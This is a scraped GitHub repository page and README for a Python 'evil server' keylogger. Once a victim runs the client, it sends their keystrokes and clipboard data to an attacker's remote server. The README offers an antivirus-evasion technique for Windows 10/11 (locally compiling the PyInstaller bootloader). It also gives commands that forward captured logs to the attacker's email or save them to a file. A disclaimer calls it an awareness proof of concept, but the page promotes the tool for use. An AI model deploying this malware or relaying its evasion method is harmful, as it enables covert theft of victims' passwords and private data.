https://github.com/jsmoreira02/keylogger-evil_server
POC of a Advanced keylogger and covert channel - Remotely receiving victim's keystrokes and clipboard data. emulating an illegal covert channel between the victim and the attacker
https://github.com/jsmoreira02/keylogger-evil_server
black-hat-python covert-channel cybersecurity-awareness hacking hacking-tool keylogger keylogger-python malicious-scripts
Last synced: 12 days ago
JSON representation
POC of a Advanced keylogger and covert channel - Remotely receiving victim's keystrokes and clipboard data. emulating an illegal covert channel between the victim and the attacker
- Host: GitHub
- URL: https://github.com/jsmoreira02/keylogger-evil_server
- Owner: Jsmoreira02
- License: mit
- Created: 2023-09-19T17:12:25.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-10-22T18:42:53.000Z (7 months ago)
- Last Synced: 2025-03-31T22:01:53.863Z (about 2 months ago)
- Topics: black-hat-python, covert-channel, cybersecurity-awareness, hacking, hacking-tool, keylogger, keylogger-python, malicious-scripts
- Language: Python
- Homepage:
- Size: 68.4 KB
- Stars: 6
- Watchers: 0
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README

![]()
![]()
![]()
![]()
![]()
![]()
Evil keylogger server (Covert Channel)
* ***Feel free to modify it as you see fit and it can be improved in many ways to suit your needs.***
This project focuses on a malicious server that remotely receives keyboard logs and data saved on the victim's clipboard, emulating an illegal covert channel between the victim and the attacker. When the victim runs the keylogger, the first thing it will do is connect to the attacker's remote server and send the logs in real time. It has been carefully designed to present the keyboard logs in the most user-friendly way possible.
****(Remember to add your local or proxy IP address in the keylogger script)****
### Evading the antivirus (Windows 10/11):
Simple technique: Compile the PyInstaller bootloader locally using Microsoft C/C++ compiler and then use pyinstaller to compile the keylogger code.# Optionals
#### Send the keyboard logs to the attacker's e-mail address
`./app.py 192.168.32.34 -e smtp.gmail.com`

#### Write the keystroke logs to a file
`./app.py 192.168.18.20 -f keylogs.txt`

# Warning:
> I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept and is intended to raise awareness about cybersecurity